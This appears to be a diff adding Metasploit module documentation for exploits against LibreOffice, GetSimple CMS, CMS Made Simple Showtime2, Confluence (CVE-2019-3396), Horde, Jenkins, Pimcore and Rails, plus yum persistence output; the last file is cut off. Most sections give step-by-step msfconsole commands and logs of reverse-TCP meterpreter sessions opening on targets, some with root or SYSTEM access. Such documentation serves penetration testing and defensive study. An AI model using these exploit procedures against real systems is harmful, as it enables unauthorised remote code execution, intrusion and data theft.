+msf5 exploit(linux/local/yum_package_manager_persistence) > [*] Command shell session 2 opened (172.22.222.136:4444 -> 172.22.222.135:43791) at 2019-04-30 06:21:12 -0500
+
+msf5 exploit(linux/local/yum_package_manager_persistence) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type             Information  Connection
+  --  ----  ----             -----------  ----------
+  1         shell x86/linux               172.22.222.136:4444 -> 172.22.222.135:43790 (172.22.222.135)
+  2         shell cmd/unix                172.22.222.136:4444 -> 172.22.222.135:43791 (172.22.222.135)
+
+msf5 exploit(linux/local/yum_package_manager_persistence) > sessions -i 2
+[*] Starting interaction with 2...
+
+id    
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux localhost.localdomain 3.17.4-301.fc21.x86_64 #1 SMP Thu Nov 27 19:09:10 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 172.22.222.135 - Command shell session 2 closed.
+msf5 exploit(linux/local/yum_package_manager_persistence) > 
+```
+
+Note: Session 2 is received after running yum update on the remote host.
@@ -0,0 +1,98 @@
+## Description
+
+  This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.2.1` that enables remote code execution.
+  Note: `6.0.x` and `6.1.3.x` versions are reportedly vulnerable to the directory traversal attack, but are not exploitable by
+  this module due to the lack of ability to pass arguments.
+
+  LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events
+  to them. A macro can be tied to a program event by including the script that contains the macro and the function
+  name to be executed. Additionally, a directory traversal vulnerability exists in the component that references the
+  Python script to be executed. This allows a program event to execute functions from Python scripts relative to the
+  path of the samples macros folder. The `pydoc.py` script included with LibreOffice contains the `tempfilepager` function
+  that passes arguments to `os.system`, allowing RCE.
+
+  This module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code.
+
+## Vulnerable Application
+
+  LibreOffice `v6.1.0-6.1.4.1`. Vulnerable versions for both Windows and Linux can be found [here](https://downloadarchive.documentfoundation.org/libreoffice/old/).
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/fileformat/libreoffice_macro_exec```
+  4. Do: ```set FILENAME <name>```
+  5. Do: ```set LHOST <ip>```
+  6. Do: ```set LPORT <port>```
+  7. Do: ```run```
+  8. Move the generated file to the target
+  9. Start a handler
+ 10. Open the file with a vulnerable version of LibreOffice
+ 11. You should get a shell.
+
+## Scenarios
+
+### Tested on LibreOffice 6.1.2.1 running Windows 7
+
+  ```
+  msf5 > use exploit/multi/fileformat/libreoffice_macro_exec 
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
+
+  [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
+  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444 
+  [*] Sending stage (179779 bytes) to 192.168.37.156
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.156:49180) at 2019-04-12 15:14:04 -0500
+
+  meterpreter > getuid
+  Server username: WIN-MGMN7ND70I1\a_user
+  meterpreter > sysinfo
+  Computer        : WIN-MGMN7ND70I1
+  OS              : Windows 7 (Build 7601, Service Pack 1).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 1
+  Meterpreter     : x86/windows
+  ```
+
+### Tested on LibreOffice 6.1.0.1 running Ubuntu 18.04
+
+  ```
+  msf5 > use exploit/multi/fileformat/libreoffice_macro_exec
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set target 1
+  target => 1
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
+
+  [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
+  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
+  msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
+  payload => linux/x86/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set LHOST 192.168.37.1
+  LHOST => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Sending stage (985320 bytes) to 192.168.37.174
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.174:39912) at 2019-04-12 14:50:08 -0500
+
+  meterpreter > getuid
+  Server username: uid=1000, gid=1000, euid=1000, egid=1000
+  meterpreter > sysinfo
+  Computer     : 192.168.37.174
+  OS           : Ubuntu 18.04 (Linux 4.18.0-16-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  ```
@@ -0,0 +1,48 @@
+## Description
+
+  This module exploits a vulnerability found in GetSimpleCMS, which
+  allows unauthenticated attackers to perform Remote Code Execution.
+  An arbitrary file upload vulnerability can be triggered by an
+  authenticated user, however authentication can be bypassed by leaking
+  the cms API key to target the session manager.
+
+## Vulnerable Application
+
+  GetSimple CMS versions 3.3.15 and below
+
+  Vulnerable installations can be found [here](http://get-simple.info/)
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/http/getsimplecms_unauth_code_exec```
+  4. Do: ```set RHOSTS <IP>```
+  4. Do: ```run```
+  5. You should get a shell.
+
+## Scenarios
+
+### Tested on GetSimple CMS v3.3.15 on Ubuntu 18.04
+
+  ```
+  msf5 > use exploit/multi/http/getsimplecms_unauth_code_exec
+  msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 192.168.37.137
+  rhosts => 192.168.37.137
+  msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set verbose true
+  verbose => true
+  msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] GetSimpleCMS version 3315
+  [*] Sending stage (38247 bytes) to 192.168.37.137
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.137:32976) at 2019-05-16 11:22:39 -0500
+
+  meterpreter > getuid
+  Server username: www-data (33)
+  meterpreter > sysinfo
+  Computer    : ubuntu
+  OS          : Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64
+  Meterpreter : php/linux
+  meterpreter >
+  ```
@@ -0,0 +1,70 @@
+## Description
+
+This module exploits a File Upload vulnerability that lead in a RCE in Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated user with "Use Showtime2" privilege could exploit the vulnerability.
+
+The vulnerability exists in the Showtime2 module, where the class "class.showtime2_image.php" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG).
+
+Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1 and 2.2.10
+
+## Vulnerable Application
+
+Affecting Showtime2 CMS Made Simple (CMSMS) module, version 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2
+
+## Verification Steps
+
+1. Setting up a working installation of CMS Made Simple (CMSMS)
+2. Download Showtime2 module (< 3.6.3)
+3. Log-in to admin panel with the administrator credentials
+4. Go in *site admin* => *Module Manager* and import the Showtime2 module
+5. Once the module is uploaded, click on *install* to install the module
+6. [OPTIONALLY] setting up a new user, assign it to a group and set the *Use Showtime2* permissions on group
+7. Start `msfconsole`
+8. `use exploit/multi/http/cmsms_showtime2_rce`
+9. `set RHOST <IP>`
+10. `set USERNAME <USERNAME>`
+11. `set PASSWORD <PASSWORD>`
+12. `check`
+13. You should see `The target appears to be vulnerable.`
+14. `exploit`
+15. You should get a meterpreter session!
+
+## Options
+
+* **TARGETURI**: Path to CMS Made Simple (CMSMS) App installation (“/” is the default)
+* **USERNAME**: Username to authenticate with
+* **PASSWORD**: Password to authenticate with
+
+## Scenario
+
+### Tested on Showtime 3.6.2 on CMS Made Simple (CMMS) 2.2.10
+
+```
+msf5 > use exploit/multi/http/cmsms_showtime2_rce 
+msf5 exploit(multi/http/cmsms_showtime2_rce) > set rhost target.com
+rhost => target.com
+msf5 exploit(multi/http/cmsms_showtime2_rce) > check
+
+[*] Showtime2 version: 3.6.2
+[*] 192.168.2.59:80 - The target appears to be vulnerable.
+msf5 exploit(multi/http/cmsms_showtime2_rce) > set username Designer
+username => Designer
+msf5 exploit(multi/http/cmsms_showtime2_rce) > set password d3s1gn3r
+password => d3s1gn3r
+msf5 exploit(multi/http/cmsms_showtime2_rce) > exploit
+
+[*] Started reverse TCP handler on 10.0.8.2:4444 
+[*] Showtime2 version: 3.6.2
+[*] Uploading PHP payload.
+[*] Making request for '/06wp7Fen.php' to execute payload.
+[*] Sending stage (38247 bytes) to 192.168.2.59
+[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:59932) at 2019-03-19 23:27:07 +0100
+[!] Tried to delete ./06wp7Fen.php, unknown result
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.2.59 - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/cmsms_showtime2_rce) > 
+```
@@ -0,0 +1,161 @@
+# Description
+
+This module exploits a Velocity Template Injection in Atlassian Confluence Widget Connector Macro before 6.14.2 to execute arbitrary code (CVE-2019-3396). No authentication is required to exploit this vulnerability.
+
+The vulnerability exists in the Widget Connector Macro which allow inject the "\_template" from the outside for some services, such as Youtube, Viddler, DailyMotion, etc.
+
+The module has been tested with on Atlassian Confluence 6.6.12, 6.8.2, 6.12.0 and 6.13.0 using Java, Windows and Linux meterpreter payload.
+
+References:
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
+https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html
+
+# Vulnerable Application
+Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2.
+
+# Verification Steps
+
+- [ ] Setting up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/confluence_widget_connector`
+- [ ] `set RHOST <IP>`
+- [ ] `set RPORT <PORT>`
+- [ ] `set SRVHOST <HOST_IP>`
+- [ ] `check`
+- [ ] You should see `The target is vulnerable`
+- [ ] `exploit`
+- [ ] You should get a meterpreter session.
+
+# Options
+- **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
+- **TRIGGERURL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=kxopViU98Xo" is the default)
+
+# Scenario
+## Tested on Confluence 6.8.2 with Windows target
+```
+msf5 > use exploit/multi/http/confluence_widget_connector
+msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
+RHOST => target.com
+msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
+RPORT => 8090
+msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
+SRVHOST => 192.168.0.1
+msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows
+TARGET => Windows
+msf5 exploit(multi/http/confluence_widget_connector) > check
+[*] target.com:8090 - Starting the FTP server.
+[*] target.com:8090 - Started service listener on 192.168.0.1:8021
+[+] target.com:8090 - The target is vulnerable.
+[*] target.com:8090 - Server stopped.
+msf5 exploit(multi/http/confluence_widget_connector) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 192.168.0.1:4444
+[*] target.com:8090 - Starting the FTP server.
+[*] target.com:8090 - Started service listener on 192.168.0.1:8021
+msf5 exploit(multi/http/confluence_widget_connector) >
+[*] target.com:8090 - Target being detected as: Windows 10
+[*] target.com:8090 - Attempting to upload C:\PROGRA~1\Atlassian\Confluence\temp\gAdGh.exe
+[*] target.com:8090 - Attempting to copy payload to C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
+[*] target.com:8090 - Attempting to execute C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
+[*] Sending stage (179779 bytes) to target.com
+[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:62528) at 2019-04-11 03:13:37 +0000
+[*] target.com:8090 - Waiting for exploit to complete...
+[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\FFDBo.exe' on the target
+[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\JLzIZ.exe' on the target
+[*] target.com:8090 - Server stopped.
+msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] target.com - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/confluence_widget_connector) >
+```
+
+## Tested on Confluence 6.8.2 with Java target
+```
+msf5 > use exploit/multi/http/confluence_widget_connector
+msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
+RHOST => target.com
+msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
+RPORT => 8090
+msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
+SRVHOST => 192.168.0.1
+msf5 exploit(multi/http/confluence_widget_connector) > check
+[*] target.com:8090 - Starting the FTP server.
+[*] target.com:8090 - Started service listener on 192.168.0.1:8021
+[+] target.com:8090 - The target is vulnerable.
+[*] target.com:8090 - Server stopped.
+msf5 exploit(multi/http/confluence_widget_connector) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 192.168.0.1:4444
+[*] target.com:8090 - Starting the FTP server.
+[*] target.com:8090 - Started service listener on 192.168.0.1:8021
+msf5 exploit(multi/http/confluence_widget_connector) >
+[*] target.com:8090 - Target being detected as: Linux
+[*] target.com:8090 - Attempting to upload  /opt/atlassian/confluence/temp/EjpPf.jar
+[*] target.com:8090 - Attempting to execute  /opt/atlassian/confluence/temp/EjpPf.jar
+[*] Sending stage (53866 bytes) to target.com
+[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
+[+] target.com:8090 -Deleted /opt/atlassian/confluence/temp/EjpPf.jar
+[*] target.com:8090 - Waiting for exploit to complete...
+[*] target.com:8090 - Server stopped.
+msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: confluence
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] target.com - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/confluence_widget_connector) >
+```
+
+## Tested on Confluence 6.8.2 with Linux target
+```
+msf5 > use exploit/multi/http/confluence_widget_connector
+msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
+RHOST => target.com
+msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
+RPORT => 8090
+msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
+SRVHOST => 192.168.0.1
+msf5 exploit(multi/http/confluence_widget_connector) > check
+[*] target.com:8090 - Starting the FTP server.
+[*] target.com:8090 - Started service listener on 192.168.0.1:8021
+[+] target.com:8090 - The target is vulnerable.
+[*] target.com:8090 - Server stopped.
+msf5 exploit(multi/http/confluence_widget_connector) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 192.168.0.1:4444
+[*] target.com:8090 - Starting the FTP server.
+[*] target.com:8090 - Started service listener on 192.168.0.1:8021
+msf5 exploit(multi/http/confluence_widget_connector) >
+[*] target.com:8090 - Target being detected as: Linux
+[*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/BYHzD
+[*] target.com:8090 - Attempting to copy payload to /opt/atlassian/confluence/temp/dESMnt
+[*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/dESMnt
+[*] Sending stage (985320 bytes) to target.com
+[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
+[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/BYHzD
+[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/dESMnt
+[*] target.com:8090 - Waiting for exploit to complete...
+[*] target.com:8090 - Server stopped.
+msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: uid=1001, gid=1001, euid=1001, egid=1001
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] target.com - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/confluence_widget_connector) >
+```
@@ -0,0 +1,101 @@
+Horde Groupware Webmail is a popular open-source groupware platform written in PHP. A vulnerability allows an authenticated, unprivileged user to create a malicious PHP file under the web root and gain arbitrary code execution on the server. 
+
+## Vulnerable Application
+
+The Horde subcomponent Horde Form < 2.0.19 is affected. This module was specifically tested against Horde Groupware Webmail Edition 5.2.22 and 5.2.17 with Horde Form 2.0.18 installed with PEAR on Debian.
+
+### Docker install on Ubuntu 18.04
+
+Please folow these steps to setup a vulnerable version of Horde in Docker on a Ubuntu.
+
+1. Set up a [Ubuntu](http://www.ubuntu.com/) 18.04 box.
+2. Open a terminal, and enter: ```sudo apt-get install docker.io```. Make sure Docker is properly configured and your current user has permession to use it.
+3. Enter: ```mkdir horde_form_file_upload``` to create a folder.
+4. Enter: ```cd horde_form_file_upload``` to enter that folder.
+5. Create a ```Dockerfile``` in it with the following content.
+
+```
+FROM debian
+
+RUN apt-get update
+RUN apt-get install --yes --no-install-recommends \
+    apache2 \
+    ca-certificates \
+    dovecot-imapd \
+    libapache2-mod-php \
+    mysql-server \
+    php-mysqli \
+    php-pear \
+    rsyslog
+
+RUN pear upgrade PEAR
+RUN pear channel-discover pear.horde.org
+RUN pear install horde/horde_role
+RUN rm -r /var/www/html/ && mkdir /var/www/html/
+RUN echo /var/www/html/ | pear run-scripts horde/Horde_Role
+RUN pear install -a -B horde/webmail-5.2.22
+# Uninstall end reinstall the vulnerable version
+RUN pear uninstall -n horde/Horde_Form
+RUN pear install -a -B horde/Horde_Form-2.0.18 
+RUN sed -i "/'secure' => 'tls',/d" /var/www/html/imp/config/backends.php
+RUN chown -R www-data:www-data /var/www/html/
+
+RUN useradd -m -G mail user && echo 'user:user' | chpasswd
+
+RUN echo 'disable_plaintext_auth = no' | tee /etc/dovecot/conf.d/99-auth.conf
+
+ENTRYPOINT \
+           /etc/init.d/mysql start && \
+           echo 'CREATE DATABASE IF NOT EXISTS horde;' | mysql && \
+           echo 'CREATE USER IF NOT EXISTS horde;' | mysql && \
+           echo 'GRANT ALL ON horde.* TO horde IDENTIFIED BY "horde";' | mysql && \
+           { echo mysqli;    sleep 0.3; \
+             echo horde;     sleep 0.3; \
+             echo horde;     sleep 0.3; \
+             echo tcp;       sleep 0.3; \
+             echo localhost; sleep 0.3; \
+             echo;           sleep 0.3; \
+             echo horde;     sleep 0.3; \
+             echo;           sleep 0.3; \
+             echo false;     sleep 0.3; \
+             echo;           sleep 0.3; \
+             echo 1;         sleep 0.3; } | webmail-install && \
+           dovecot && \
+           /etc/init.d/apache2 start && \
+           tail -F /var/log/apache2/access.log /var/log/syslog
+```
+
+6. Enter: ```docker build . -t horde-img``` to build the Docker image.
+7. Enter: ```docker run -p8888:80 --name horde-inst horde-img``` to run the Docker instance with the name ```horde-inst```.
+8. Get the Docker host ip for reverse connection. In Linux, enter: ```ip -4 addr show docker0 | grep -Po 'inet \K[\d.]+'```.
+
+## Verification Steps
+
+After setting up Horde, you can use your exploit module:
+
+1. Start msfconsole
+2. Do: ```use exploit/multi/http/horde_form_file_upload```
+3. Do: ```set RHOSTS 127.0.0.1```
+4. Do: ```set RPORT 8888```
+5. Do: ```set payload php/meterpreter/reverse_tcp```
+6. Do: ```set LHOST [HOST IP]```
+7. Do: ```set VHOST horde.lab```
+8. Do: ```set USERNAME user ```
+9. Do: ```set PASSWORD user```
+10. Do: ```exploit```
+11. And you should get a session
+
+## Scenarios
+
+### Horde Groupware Webmail Edition 5.2.22 with Horde Form 2.0.18 on a Debian stretch on Docker running on an Ubuntu 16.04
+
+```
+msf exploit(multi/http/horde_form_file_upload) > exploit
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Uploading payload to ../var/www/html/static/mxkyfrlztogn.php
+[*] Sending stage (38247 bytes) to 172.17.0.3
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:47720) at 2019-03-29 15:27:53 +0000
+
+meterpreter > 
+```
@@ -0,0 +1,88 @@
+## Intro
+
+This module exploits a vulnerability in Jenkins dynamic routing to
+bypass the `Overall/Read` ACL and leverage Groovy metaprogramming to
+download and execute a malicious JAR file.
+
+When the `Java Dropper` target is selected, the original entry point
+based on `classLoader.parseClass` is used, which requires the use of
+Groovy metaprogramming to achieve RCE.
+
+When the `Unix In-Memory` target is selected, a newer, higher-level,
+and more universal entry point based on `GroovyShell.parse` is used.
+This permits the use of in-memory arbitrary command execution.
+
+The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
+on later versions of Jenkins.
+
+Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
+
+## Setup
+
+1. `git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc`
+2. `cd cve-2019-1003000-jenkins-rce-poc/sample-vuln`
+3. Edit `run.sh` and change `2.152-alpine` to `2.137`
+4. `./run.sh`
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Unix In-Memory
+1   Java Dropper
+```
+
+## Options
+
+**RPORT**
+
+Set this to the Jenkins port. The default is 8080.
+
+**TARGETURI**
+
+Set this to the Jenkins base path. The default is `/`.
+
+**SRVPORT**
+
+Set this to the port on which to serve the payload. Change it from 8080
+to something like 8081 if you are testing Jenkins locally on port 8080.
+
+This option is valid only for the `Java Dropper` target.
+
+**ForceExploit**
+
+Set this to `true` to override the `check` result during exploitation.
+
+## Usage
+
+```
+msf5 exploit(multi/http/jenkins_metaprogramming) > run
+
+[*] Started HTTPS reverse handler on https://192.168.1.2:8443
+[*] Jenkins 2.137 detected
+[+] Jenkins 2.137 is a supported target
+[+] ACL bypass successful
+[*] Using URL: http://0.0.0.0:8081/
+[*] Local IP: http://192.168.1.2:8081/
+[*] Configuring Java Dropper target
+[*] Sending Jenkins and Groovy go-go-gadgets
+[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
+[-] Sending 404
+[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
+[+] Sending 200
+[*] GET /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
+[+] Sending payload JAR
+[*] https://192.168.1.2:8443 handling request from 192.168.1.2; (UUID: qlrpxu6t) Staging java payload (54399 bytes) ...
+[*] Meterpreter session 1 opened (192.168.1.2:8443 -> 192.168.1.2:58688) at 2019-03-15 18:57:24 -0500
+[*] Server stopped.
+[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/CarisaChristiansen' on the target
+
+meterpreter > getuid
+Server username: jenkins
+meterpreter > sysinfo
+Computer    : 6f21b8da2915
+OS          : Linux 4.9.93-linuxkit-aufs (amd64)
+Meterpreter : java/linux
+meterpreter >
+```
@@ -0,0 +1,110 @@
+## Description
+
+This module exploits a PHP (unserialize()) in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability.
+
+The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method make it possible to exploit the unserialize function when passing untrusted values in "data" parameter.
+
+Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.6.6 with the Symfony unserialize payload.
+
+Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload.
+
+## Vulnerable Application
+
+Affecting Pimcore, version 5.x <= 5.6.6 and 4.x.
+
+## Verification Steps
+
+Set up a default installation of Pimcore 4.x or 5.x (e.g.: `composer create-project pimcore/skeleton my-project` for the 5.x branch) as described on [Pimcore Installation documentation](https://pimcore.com/docs/5.x/Development_Documentation/Getting_Started/Installation.html) then:
+
+1. Start `msfconsole`
+2. `use exploit/multi/http/pimcore_unserialize_rce`
+3. `set RHOST <IP>`
+4. `set USERNAME <USERNAME>`
+5. `set PASSWORD <PASSWORD>`
+6. `check`
+7. You should see `The target service is running, but could not be validated.`
+8. `exploit`
+9. You should get a meterpreter session!
+
+## Options
+
+* **TARGETURI**: Path to Pimcore installation (“/” is the default)
+* **USERNAME**: Username to authenticate with
+* **PASSWORD**: Password to authenticate with
+
+## Scenario
+
+### Tested on Pimcore 5.6.6
+
+```
+msf5 > use exploit/multi/http/pimcore_unserialize_rce 
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com
+rhost => target.com
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8566
+rport => 8566
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin
+username => admin
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set password pimcore
+password => pimcore
+msf5 exploit(multi/http/pimcore_unserialize_rce) > check
+[*] 192.168.2.59:8566 - The target service is running, but could not be validated.
+msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit
+
+[*] Started reverse TCP handler on 10.0.8.2:4444 
+[+] Authentication successful: admin:pimcore
+[*] Pimcore version: 5.6.6
+[*] Pimcore build: 9722d19576f9e49969d4a3708e045fa481eaad02
+[+] The target is vulnerable!
+[+] JSON paylod uploaded successful: /var/www/html/var/tmp/bulk-import.tmp
+[*] Selected payload: Pimcore 5.x (Symfony unserialize payload)
+[*] Sending stage (38247 bytes) to 192.168.2.59
+[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:34128) at 2019-04-07 12:04:08 +0200
+[!] This exploit may require manual cleanup of '/var/www/html/var/tmp/bulk-import.tmp' on the target
+
+meterpreter > 
+[+] Deleted /var/www/html/var/tmp/bulk-import.tmp
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.2.59 - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/pimcore_unserialize_rce) > 
+```
+
+### Tested on Pimcore 4.6.5
+
+```
+msf5 > use exploit/multi/http/pimcore_unserialize_rce 
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com
+rhost => target.com
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8465
+rport => 8465
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin
+username => admin
+msf5 exploit(multi/http/pimcore_unserialize_rce) > set password P1mc0r3_4dm1n
+password => P1mc0r3_4dm1n
+msf5 exploit(multi/http/pimcore_unserialize_rce) > check
+[*] 192.168.2.59:8465 - The target service is running, but could not be validated.
+msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit
+
+[*] Started reverse TCP handler on 10.0.8.2:4444 
+[+] Authentication successful: admin:P1mc0r3_4dm1n
+[*] Pimcore version: 4.6.5
+[*] Pimcore build: 4123
+[+] The target is vulnerable!
+[+] JSON paylod uploaded successful: /var/www/html/website/var/system/bulk-import.tmp
+[*] Selected payload: Pimcore 4.x (Zend unserialize payload)
+[*] Sending stage (38247 bytes) to 192.168.2.59
+[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:57882) at 2019-04-07 12:00:20 +0200
+[+] Deleted /var/www/html/website/var/system/bulk-import.tmp
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.2.59 - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/pimcore_unserialize_rce) > 
+```
@@ -0,0 +1,105 @@
+# Ruby on Rails DoubleTap Development Mode secret_key_base Vulnerability
+
+## Background
+
+Ruby on Rails is a server-side web application framework written in Ruby. It is a model-view-controller (MVC) architecture, providing default structures for a database, a web service, and web pages. It is also a popular choice of framework among well known services and products such as Github, Bloomberg, Soundcloud, Groupon, Twitch.tv, and of course, Rapid7s Metasploit.
+
+In development mode, Ruby on Rails versions including 5.2.2 and prior are vulnerable to a remote code execution vulnerability due to a predictable secret_key_base based on the name of the Rails application, and use it to create a signed serialized payload, and gain remote code execution.
+
+## Vulnerable Setup
+
+In order to set up a vulnerable box for testing, do this on a Linux machine (such as Ubuntu), and assuming you already have rvm installed:
+
+```
+$ rvm gemset create test
+$ rvm gemset use test
+$ gem install rails '5.2.1'
+$ rails new demo
+```
+
+Next, `cd` to demo, and then modify the Gemfile like this:
+
+```
+$ echo "gem 'rails', '5.2.1'" >> Gemfile
+$ echo "gem 'sqlite3', '~> 1.3.6', '< 1.4'" >> Gemfile
+$ echo "source 'https://rubygems.org'" >> Gemfile
+$ bundle
+```
+
+Next, add a new controller:
+
+```
+rails generate controller metasploit
+```
+
+And add the index method for that controller (under app/controllers/metasploit_controllers.rb):
+
+```
+class MetasploitController < ApplicationController
+  def index
+    render file: "#{Rails.root}/test.html"
+  end
+end
+```
+
+In the root directory, add a new test.html:
+
+```
+echo Hello World > test.html
+```
+
+Also, add that new route in config/routes.rb:
+
+```
